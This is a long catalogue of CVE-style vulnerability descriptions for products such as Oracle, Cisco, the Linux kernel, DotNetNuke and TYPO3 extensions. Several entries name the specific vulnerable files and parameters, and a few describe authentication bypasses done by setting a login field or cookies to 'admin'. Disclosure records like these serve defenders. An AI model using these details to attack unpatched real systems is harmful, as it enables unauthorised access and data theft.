Unspecified vulnerability in HP-UX B.11.11 running VERITAS Oracle Disk Manager (VRTSodm) 3.5, B.11.23 running VRTSodm 4.1 or VERITAS File System (VRTSvxfs) 4.1, B.11.23 running VRTSodm 5.0 or VRTSvxfs 5.0, and B.11.31 running VRTSodm 5.0 allows local users to gain root privileges via unknown vectors.
Unspecified vulnerability in NFS in HP ONCplus B.11.31.05 and earlier for HP-UX B.11.31 allows local users to cause a denial of service via unknown vectors.
Buffer overflow in VUPlayer allows user-assisted attackers to have an unknown impact via a long file, as demonstrated by a file composed entirely of 'A' characters.
Unspecified vulnerability in IBM Hardware Management Console (HMC) 7 release 3.2.0 SP1 has unknown impact and attack vectors.
SQL injection vulnerability in frontpage.php in Goople CMS 1.8.2 allows remote attackers to execute arbitrary SQL commands via the password parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Settings Manager in Adobe Flash Player 9.x before 9.0.159.0 and 10.x before 10.0.22.87, and possibly other versions, allows remote attackers to trick a user into visiting an arbitrary URL via unknown vectors, related to "a potential Clickjacking issue variant."
Buffer overflow in net/sctp/sm_statefuns.c in the Stream Control Transmission Protocol (sctp) implementation in the Linux kernel before 2.6.28-git8 allows remote attackers to have an unknown impact via an FWD-TSN (aka FORWARD-TSN) chunk with a large stream ID.
Unspecified vulnerability in the Cisco Wireless LAN Controller (WLC), Cisco Catalyst 6500 Wireless Services Module (WiSM), and Cisco Catalyst 3750 Integrated Wireless LAN Controller with software 4.2.173.0 allows remote authenticated users to gain privileges via unknown vectors, as demonstrated by escalation from the (1) Lobby Admin and (2) Local Management User privilege levels.
Unspecified vulnerability in the Wireless LAN Controller (WLC) TSEC driver in the Cisco 4400 WLC, Cisco Catalyst 6500 and 7600 Wireless Services Module (WiSM), and Cisco Catalyst 3750 Integrated Wireless LAN Controller with software 4.x before 4.2.176.0 and 5.x before 5.1 allows remote attackers to cause a denial of service (device crash or hang) via unknown IP packets.
Memory leak in the keyctl_join_session_keyring function (security/keys/keyctl.c) in Linux kernel 2.6.29-rc2 and earlier allows local users to cause a denial of service (kernel memory consumption) via unknown vectors related to a "missing kfree."
csregprinter in the Printing component in Apple Mac OS X 10.4.11 and 10.5.6 does not properly handle error conditions, which allows local users to execute arbitrary code via unknown vectors that trigger a heap-based buffer overflow.
Unspecified vulnerability in fseventsd in the FSEvents framework in Apple Mac OS X 10.5.6 allows local users to obtain sensitive information (filesystem activities and directory names) via unknown vectors related to "credential management."
Certificate Assistant in Apple Mac OS X 10.5.6 allows local users to overwrite arbitrary files via unknown vectors related to an "insecure file operation" on a temporary file.
SQL injection vulnerability in admin/login.php in jSite 1.0 OE allows remote attackers to execute arbitrary SQL commands via the username parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the docnote string handling implementation in IBM Lotus Quickr 8.1 before 8.1.0.2 services for Lotus Domino allows remote attackers to cause a denial of service (daemon crash) via unknown vectors, aka SPR JFLD7GZT25.
Cross-site scripting (XSS) vulnerability in an unspecified Shockwave Flash file in RSA Adaptive Authentication 2.x and 5.7.x allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
mm/shmem.c in the Linux kernel before 2.6.28-rc8, when strict overcommit is enabled and CONFIG_SECURITY is disabled, does not properly handle the export of shmemfs objects by knfsd, which allows attackers to cause a denial of service (NULL pointer dereference and knfsd crash) or possibly have unspecified other impact via unknown vectors.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-1643.
libraries/File.class.php in phpMyAdmin 2.11.x before 2.11.10 uses predictable filenames for temporary files, which has unknown impact and attack vectors.
libraries/File.class.php in phpMyAdmin 2.11.x before 2.11.10 creates a temporary directory with 0777 permissions, which has unknown impact and attack vectors.
Multiple unspecified vulnerabilities in Oracle E-Business Suite 11.5.10.2 allow remote attackers to affect confidentiality via unknown vectors related to the (1) Oracle Application Object Library (APP02) and (2) Oracle Applications Manager (APP04).
Multiple unspecified vulnerabilities in Oracle E-Business Suite 12.0.3 allow (1) local users to affect confidentiality and integrity via unknown vectors related to the Mobile Application Server component (APP01); (2) remote attackers to affect confidentiality via unknown vectors related to the Oracle Applications Framework (APP03); remote authenticated users to affect confidentiality and integrity via unknown vectors related to the (3) CRM Technical Foundation (APP05) and (4) Oracle Application Object Library (APP06); and remote authenticated users to affect integrity and availability via unknown vectors related to (5) Oracle Applications Technology Stack (APP07).
Unspecified vulnerability in the Oracle Internet Directory component in Oracle Application Server 9.0.4.3 and 10.1.2.2 allows remote authenticated users to affect confidentiality via unknown vectors, aka AS06.
Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.2 and 10.1.3.1 allows remote attackers to affect integrity via unknown vectors, aka AS05.
Unspecified vulnerability in the Oracle Forms component in Oracle Application Server 10.1.2.2 and E-Business Suite 12.0.3 allows remote attackers to affect integrity via unknown vectors, aka AS04.
Unspecified vulnerability in the Oracle BPEL Worklist Application component in Oracle Application Server 10.1.2.2 and 10.1.3.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, aka AS03.
Unspecified vulnerability in the E-Business Application client, as used in Oracle Application Server 1.1.8.26 and E-Business Suite 11.5.10.2, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to the Oracle Jinitiator component, aka AS02.
Unspecified vulnerability in Small Footprint CIM Broker (SFCB) before 1.2.5 has unknown impact and attack vectors.
PartialBufferOutputStream2 in GeoServer before 1.6.1 and 1.7.0-beta1 attempts to flush buffer contents even when it is handling an "in memory buffer," which prevents the reporting of a service exception, with unknown impact and attack vectors.
Unspecified vulnerability in Prototype JavaScript framework (prototypejs) before 1.6.0.2 allows attackers to make "cross-site ajax requests" via unknown vectors.
Horde Kronolith H3 2.1 before 2.1.7 and 2.2 before 2.2-RC2; Nag H3 2.1 before 2.1.4 and 2.2 before 2.2-RC2; Mnemo H3 2.1 before 2.1.2 and H3 2.2 before 2.2-RC2; Groupware 1.0 before 1.0.3 and 1.1 before 1.1-RC2; and Groupware Webmail Edition 1.0 before 1.0.4 and 1.1 before 1.1-RC2 does not validate ownership when performing share changes, which has unknown impact and attack vectors.
Unspecified vulnerability in the Horde API in Horde 3.1 before 3.1.6 and 3.2 before 3.2 before 3.2-RC2; Turba H3 2.1 before 2.1.6 and 2.2 before 2.2-RC2; Kronolith H3 2.1 before 2.1.7 and H3 2.2 before 2.2-RC2; Nag H3 2.1 before 2.1.4 and 2.2 before 2.2-RC2; Mnemo H3 2.1 before 2.1.2 and 2.2 before 2.2-RC2; Horde Groupware 1.0 before 1.0.3 and 1.1 before 1.1-RC2; and Groupware Webmail Edition 1.0 before 1.0.4 and 1.1 before 1.1-RC2 has unknown impact and attack vectors.
Unspecified vulnerability in Electronic Logbook (ELOG) before 2.7.2 has unknown impact and attack vectors when the "logbook contains HTML code," probably cross-site scripting (XSS).
Multiple cross-site scripting (XSS) vulnerabilities in OpenWebMail before 2.53 (Stable) allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
Double free vulnerability in Deliantra server engine before 2.4 has unknown impact and attack vectors.
Multiple unspecified vulnerabilities in phpns before 2.1.1beta1 have unknown impact and attack vectors.
Multiple unspecified vulnerabilities in G15Daemon before 1.9.4 have unknown impact and attack vectors.
Unspecified vulnerability in metashell before 0.03 has unknown impact and attack vectors related to a "PATH execution security flaw," possibly an untrusted search path vulnerability.
Unspecified vulnerability in Fujitsu Interstage HTTP Server, as used in Interstage Application Server Enterprise Edition 7.0.1 for Solaris, allows attackers to cause a denial of service via unknown vectors related to SSL.
Unspecified vulnerability in Adium before 1.2 has unknown impact and attack vectors related to javascript: URLs, possibly cross-site scripting (XSS).
Multiple unspecified vulnerabilities in Local Media Browser before 0.1 have unknown impact and attack vectors related to "Security holes."
Buffer overflow in the listing module in Netwide Assembler (NASM) before 2.03.01 has unknown impact and attack vectors, a different vulnerability than CVE-2008-2719.
Multiple unspecified vulnerabilities in Shareaza before 2.3.1.0 have unknown impact and attack vectors related to "very important security fixes," possibly involving update notifications and a domain that is no longer controlled by the vendor.
Unspecified vulnerability in AgileWiki before 0.10.1 has unknown impact and attack vectors related to passwords.
Multiple unspecified vulnerabilities in RARLAB WinRAR before 3.71 have unknown impact and attack vectors related to crafted (1) ACE, (2) ARJ, (3) BZ2, (4) CAB, (5) GZ, (6) LHA, (7) RAR, (8) TAR, or (9) ZIP files, as demonstrated by the OUSPG PROTOS GENOME test suite for Archive Formats.
Cross-site scripting (XSS) vulnerability in setup.php in @lex Poll 2.1 allows remote attackers to inject arbitrary web script or HTML via the language_setup parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in @lex Guestbook 4.0.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) language_setup parameter to setup.php or (2) test parameter to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: a third party has been reported that the test parameter is not used in @lex Guestbook.
Multiple cross-site scripting (XSS) vulnerabilities in the default URI in Chris LaPointe RedGalaxy Download Center 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) file parameter, (2) message parameter in a login action, (3) category parameter in a browse action, (4) now parameter, or (5) search parameter in a search_results action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in onlinetools.org EasyImageCatalogue 1.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) search and (2) d index.php parameters to index.php, (3) dir parameter to thumber.php, and the d parameter to (4) describe.php and (5) addcomment.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in Nuked-Klan 1.3 beta allows remote attackers to inject arbitrary web script or HTML via the nuked_nude parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in DB2 Monitoring Console 2.2.4 and earlier allows remote attackers to upload arbitrary files via unknown vectors.
DotNetNuke 2.0 through 4.8.4 allows remote attackers to load .ascx files instead of skin files, and possibly access privileged functionality, via unknown vectors related to parameter validation.
Unspecified vulnerability in DotNetNuke 4.0 through 4.8.4 and 5.0 allows remote attackers to obtain sensitive information (portal number) by accessing the install wizard page via unknown vectors.
Unspecified vulnerability in DotNetNuke 4.4.1 through 4.8.4 allows remote authenticated users to bypass authentication and gain privileges via unknown vectors related to a "unique id" for user actions and improper validation of a "user identity."
Unspecified vulnerability in the Manage Templates feature in Qsoft K-Rate Premium allows remote attackers to execute arbitrary PHP code via unknown vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
userHandler.cgi in RaidSonic ICY BOX NAS firmware 2.3.2.IB.2.RS.1 allows remote attackers to bypass authentication and gain administrator privileges by setting the login parameter to admin. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
AJ Square Free Polling Script (AJPoll) allows remote attackers to bypass authentication and create new polls via a direct request to admin/include/newpoll.php, a different vector than CVE-2008-7045. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in an unspecified component in Simple Machines phpRaider 1.0.7 allows remote attackers to inject arbitrary web script or HTML via the resistance field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
tnftpd before 20080929 splits large command strings into multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks via unknown vectors, probably involving a crafted ftp:// link to a tnftpd server.
Buffer overflow in Electronic Logbook (ELOG) before 2.7.1 has unknown impact and attack vectors, possibly related to elog.c.
Unrestricted file upload vulnerability in the file manager in Creative Mind Creator CMS 5.0 allows remote attackers to execute arbitrary code via unknown vectors.
Siemens Gigaset WLAN Camera 1.27 has an insecure default password, which allows remote attackers to conduct unauthorized activities. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in gallery.php in Easy Photo Gallery (aka Ezphotogallery) 2.1 allows remote attackers to execute arbitrary SQL commands via the password parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unrestricted file upload vulnerability in eZoneScripts Dating Website script allows remote attackers to execute arbitrary code via unknown vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in IBM WebSphere Commerce 6.0 before 6.0.0.7 have unknown impact and attack vectors.
Multiple unspecified vulnerabilities in WorldClient in Alt-N MDaemon before 10.02 have unknown impact and attack vectors, probably related to cross-site scripting (XSS) and WorldClient DLL 10.0.1, a different vulnerability than CVE-2008-6893.
Multiple cross-site request forgery (CSRF) vulnerabilities in Collabtive 0.4.8 allow remote attackers to hijack the authentication of administrators for requests that (1) submit or edit a new project, or (2) upload files to a project, or (3) attach files to messages via unknown vectors.  NOTE: these issues can be leveraged with other vulnerabilities to create remote attack vectors that do not require authentication.
Argument injection vulnerability in Exodus 0.10 allows remote attackers to inject arbitrary command line arguments, overwrite arbitrary files, and cause a denial of service via encoded spaces in an xmpp:// URI, a different vector than CVE-2008-6935 and CVE-2008-6936.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in function.php in Zenphoto 1.1.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the "request logging" feature.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in the Live Chat (com_livechat) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the last parameter to getChatRoom.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in TGS Content Management 0.3.2r2 allow remote attackers to inject arbitrary web script or HTML via the (1) msg and (2) goodmsg parameters to (a) login.php and (b) index.php, and the (3) dir and (4) id parameters to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in search.php in Zoph 0.7.2.1 allows remote attackers to inject arbitrary web script or HTML via the _off parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in Zoph 0.7.2.1 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different issue than CVE-2008-3258.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in OpenID 5.x before 5x.-1.2, a module for Drupal, allows remote attackers to hijack the authentication of unspecified victims to delete OpenID identities via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in Atlassian JIRA Enterprise Edition 3.13 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The db2fmp process in IBM DB2 8 before FP17, 9.1 before FP5, and 9.5 before FP2 on Windows runs with "OS privilege," which has unknown impact and attack vectors, a different vulnerability than CVE-2008-3856.
Mole Group Real Estate Script 1.1 and earlier stores passwords in cleartext, which allows context-dependent attackers to obtain sensitive information.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Mole Group Lastminute Script 4.0 and earlier stores passwords in cleartext, which allows context-dependent attackers to obtain sensitive information.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in ListRecords.php in osprey 1.0a4.1 allows remote attackers to execute arbitrary PHP code via a URL in the xml_dir parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: the lib_dir vector is already covered by CVE-2006-6630.
SQL injection vulnerability in diziler.asp in Yigit Aybuga Dizi Portali allows remote attackers to execute arbitrary SQL commands via the id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in index.php in phPhotoGallery 0.92 allow remote attackers to execute arbitrary SQL commands via the (1) Username and (2) Password fields.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in Vivvo CMS before 4.0.4 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
internettoolbar/edit.php in YourPlace 1.0.2 and earlier does not end execution when an invalid username is detected, which allows remote attackers to bypass intended restrictions and edit toolbar settings via an invalid username.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in Cybozu Office 6, Cybozu Dezie before 6.0(1.0), and Cybozu Garoon 2.0.0 through 2.1.3 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the Web administration interface in Avaya Communication Manager 3.1.x before CM 3.1.4 SP2 and 4.0.x before 4.0.3 SP1 allows remote authenticated users to execute arbitrary commands via unknown vectors related to "viewing system logs."
Unspecified vulnerability in the Web administration interface in Avaya Communication Manager 3.1.x before CM 3.1.4 SP2 and 4.0.x before 4.0.3 SP1 allows remote authenticated administrators to gain root privileges via unknown vectors related to "configuring data viewing or restoring credentials."
Unspecified vulnerability in the Web management interface in Avaya SIP Enablement Services (SES) 3.x and 4.0, as used with Avaya Communication Manager 3.1.x, allows remote authenticated users to execute arbitrary commands via unknown vectors related to configuration of "local data viewing or restoring parameters."
Unspecified vulnerability in the Web management interface in Avaya SIP Enablement Services (SES) 3.x and 4.0, as used with Avaya Communication Manager 3.1.x and 4.x, allows remote authenticated administrators to gain root privileges via unknown vectors related to configuration of "data viewing or restoring parameters."
Cross-site scripting (XSS) vulnerability in Resource Library (tjs_reslib) 0.1.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Cross-site scripting (XSS) vulnerability in TARGET-E WorldCup Bets (worldcup) 2.0.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
SQL injection vulnerability in TARGET-E WorldCup Bets (worldcup) 2.0.0 and earlier extension for TYPO3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
SQL injection vulnerability in Fussballtippspiel (toto) 0.1.1 and earlier extension for TYPO3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
SQL injection vulnerability in TIMTAB social bookmark icons (timtab_sociable) 2.0.4 and earlier extension for TYPO3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
SQL injection vulnerability in Random Prayer (ste_prayer) 0.0.1 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
SQL injection vulnerability in Download system (sb_downloader) extension 0.1.4 and earlier for TYPO3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
SQL injection vulnerability in Diocese of Portsmouth Training Courses (pd_trainingcourses) extension 0.1.1 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
SQL injection vulnerability in Diocese of Portsmouth Calendar Today (pd_calendar_today) extension 0.0.3 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Unspecified vulnerability in nepa-design.de Spam Protection (nd_antispam) extension 1.0.3 for TYPO3 allows remote attackers to modify configuration via unknown vectors.
SQL injection vulnerability in JobControl (dmmjobcontrol) 1.15.0 and earlier extension for TYPO3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Cross-site scripting (XSS) vulnerability in JobControl (dmmjobcontrol) 1.15.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Cross-site scripting (XSS) vulnerability in DCD GoogleMap (dcdgooglemap) 1.1.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
SQL injection vulnerability in CoolURI (cooluri) 1.0.11 and earlier extension for TYPO3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Unspecified vulnerability in Frontend Filemanager (air_filemanager) 0.6.1 and earlier extension for TYPO3 allows remote attackers to execute arbitrary commands via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in Kronos webTA allow remote attackers to inject arbitrary web script or HTML via the description field to (1) servlet/com.threeis.webta.H710selProject and (2) servlet/com.threeis.webta.H720editProjectInfo.  NOTE: BID:29610 states that the initial report was incorrect, but the reason for this conclusion is unknown.
Multiple SQL injection vulnerabilities in BatmanPorTaL allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) uyeadmin.asp and (2) profil.asp.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in skins/default.php in Geody Labs Dagger - The Cutting Edge r12feb2008, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the dir_edge_skins parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in Zen Software Zen Cart 2008 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter in the advanced_search_result page. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in index.php in Zen Software Zen Cart 2008 allows remote attackers to execute arbitrary SQL commands via the keyword parameter in the advanced_search_result page.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Download Center Lite before 2.1 has unknown impact and attack vectors related to "A minor security fix."
Unspecified vulnerability in Epona 1.5rc3 allows remote attackers to obtain the real IP address of users via unknown vectors.
Multiple race conditions in WANPIPE before 3.3.6 have unknown impact and attack vectors related to "bri restart logic."
Cross-site scripting (XSS) vulnerability in upload/install/index.php in PHCDownload 1.1 allows remote attackers to inject arbitrary web script or HTML via the step parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in admin/index.php in PHCDownload 1.1 allows remote attackers to execute arbitrary SQL commands via the hash parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Nortel Communication Server 1000 4.50.x allows remote attackers to obtain Web application structure via unknown vectors related to "web resources to phones and administrators."
Multiple unspecified vulnerabilities in Nortel Communication Server 1000 4.50.x allow remote attackers to execute arbitrary commands to gain privileges, obtain sensitive information, or cause a denial of service via unknown vectors.
Unspecified vulnerability in the "session limitation technique" in the FTP service on Nortel Communications Server 1000 (CS1K) 4.50.x, when running on VGMC or signaling nodes, allows remote attackers to cause a denial of service (resource exhaustion and failed updates) via unknown vectors that causes consumption of all available sessions.
Unspecified vulnerability in the SIP server in SIP Enablement Services (SES) in Avaya Communication Manager 3.1.x and 4.x allows remote authenticated users to cause a denial of service (resource consumption) via unknown vectors.
Unspecified vulnerability in SIP Enablement Services (SES) in Avaya Communication Manager 3.1.x and 4.x allows remote attackers to gain privileges and cause a denial of service via unknown vectors related to reuse of valid credentials.
Unrestricted file upload vulnerability in Yehe 2.0 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in the envoyer feature.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Octopussy before 0.9.5.8 has unknown impact and attack vectors related to a "major security" vulnerability.
Cross-site scripting (XSS) vulnerability in jax_linklists.php in Jack (tR) Jax LinkLists 1.00 allows remote attackers to inject arbitrary web script or HTML via the cat parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in glossaire.php in Glossaire 2.0 allows remote attackers to inject arbitrary web script or HTML via the letter parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The password_checker function in config/multiconfig.py in MoinMoin 1.6.1 uses the cracklib and python-crack features even though they are not thread-safe, which allows remote attackers to cause a denial of service (segmentation fault and crash) via unknown vectors.
The rst parser (parser/text_rst.py) in MoinMoin 1.6.1 does not check the ACL of an included page, which allows attackers to read unauthorized include files via unknown vectors.
schema.py in FormEncode for Python (python-formencode) 1.0 does not apply the chained_validators feature, which allows attackers to bypass intended access restrictions via unknown vectors.
Unspecified vulnerability in phpns before 2.1.3 has unknown impact and attack vectors related to "activation permissions."
PHP remote file inclusion vulnerability in news/include/createdb.php in Web Server Creator Web Portal 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the langfile parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Skin Manager in DotNetNuke before 4.8.2 allows remote authenticated administrators to perform "server-side execution of application logic" by uploading a static file that is converted into a dynamic script via unknown vectors related to HTM or HTML files.
Unspecified vulnerability in 7-zip before 4.5.7 has unknown impact and remote attack vectors, as demonstrated by the PROTOS GENOME test suite for Archive Formats (c10).
Multiple directory traversal vulnerabilities in phpKF-Portal 1.10 allow remote attackers to include arbitrary files via a .. (dot dot) in the (1) tema_dizin parameter to baslik.php and (2) portal_ayarlarportal_dili parameter to anket_yonetim.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in phpBB before 3.0.4 allows attackers to obtain sensitive information via unknown vectors related to the lack of password prompts for a private message that quotes a post in a password-protected forum.
Unspecified vulnerability in phpBB before 3.0.4 allows attackers to bypass intended access restrictions and activate de-activated accounts via unknown vectors.
PHP remote file inclusion vulnerability in connexion.php in PHPGKit 0.9 allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in ClanSphere before 2008.2.1 allow remote attackers to obtain sensitive information, and possibly have unknown other impact, via vectors related to "javascript insert" and the (1) mods/messages/getusers.php and (2) mods/abcode/listimg.php files.  NOTE: some of these details are obtained from third party information.
Session fixation vulnerability in Edikon phpShop 0.8.1 allows remote attackers to hijack web sessions via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Under Construction, Baby (UCB) PC2M 0.9.22.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in multiple Century Systems routers including XR-410 before 1.6.9, XR-510 before 3.5.3, XR-440 before 1.7.8, and other XR series routers from XR-510 to XR-730 allows remote attackers to modify configuration as the administrator via unknown vectors.
Unspecified vulnerability in YourPlace before 1.0.1 has unknown impact and attack vectors, possibly related to improper authentication and the ability to upload arbitrary PHP code.  NOTE: some of these details are obtained from third party information.
Insecure method vulnerability in Sina Inc. DLoader Class ActiveX Control allows remote attackers to overwrite arbitrary files via a URL in the first parameter to the DonwloadAndInstall method.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in GreenSQL-Console before 0.3.5 allows attackers to obtain the "installation directory" via unknown vectors.
Unspecified vulnerability in Vignette Content Management 7.3.0.5, 7.3.1, 7.3.1.1, 7.4, and 7.5 allows "low privileged" users to gain administrator privileges via unknown attack vectors.
Unspecified vulnerability in DotNetNuke 4.5.2 through 4.9 allows remote attackers to "add additional roles to their user account" via unknown attack vectors.
SQL injection vulnerability in login.asp in Ocean12 Membership Manager Pro allows remote attackers to execute arbitrary SQL commands via the Password parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the TYPO3 Simple File Browser (simplefilebrowser) extension 1.0.2 and earlier allows remote attackers to obtain sensitive information via unknown attack vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in Streber before 0.08093 allow remote attackers to hijack the authentication of unspecified victims via unknown vectors.
SQL injection vulnerability in login.php in Simple Customer as downloaded on 20081118 allows remote attackers to execute arbitrary SQL commands via the email parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in signinform.php in Softbiz Classifieds Script allows remote attackers to inject arbitrary web script or HTML via the msg parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Galatolo WebManager 1.3a allows remote attackers to bypass authentication and gain administrative access by setting the (1) gwm_user and (2) gwm_pass cookies to admin.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in sISAPILocation before 1.0.2.2 allows remote attackers to bypass intended access restrictions for character encoding and the cookie secure flag via unknown vectors related to the "HTTP header rewrite function."
Directory traversal vulnerability in configuration_script.php in MyKtools 3.0 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the langage parameter, a different vulnerability than CVE-2008-4781.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in lib/url/meta_url.php in SaturnCMS allows remote attackers to execute arbitrary SQL commands via the URL to the translate function.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in OpenEdit Digital Asset Management (DAM) before 5.2014 allows remote attackers to perform unspecified actions as arbitrary users via unknown vectors.
SQL injection vulnerability in login.php in Simple Document Management System (SDMS) 1.1.5 and 1.1.4, and possibly earlier, allows remote attackers to execute arbitrary SQL commands via the login parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in Extrakt Framework 0.7 allows remote attackers to inject arbitrary web script or HTML via the plugins[file][id] parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in admin.php in Php-Stats 0.1.9.1 allows remote attackers to inject arbitrary web script or HTML via the (1) sel_mese and (2) sel_anno parameters in a systems action. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in PhpForums.net mcGallery 1.1 allow remote attackers to inject arbitrary web script or HTML via the lang parameter to (1) admin.php, (2) index.php, (3) sess.php, (4) stats.php, (5) detail.php, (6) resize.php, and (7) show.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in submitnews.php in e107 CMS 0.7.11 allows remote attackers to inject arbitrary web script or HTML via the (1) author_name, (2) itemtitle, and (3) item parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unrestricted file upload vulnerability in form_upload.php in PHPG Upload 1.0 allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in RobotStats 0.1 allow remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter to (1) graph.php and (2) robotstats.inc.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
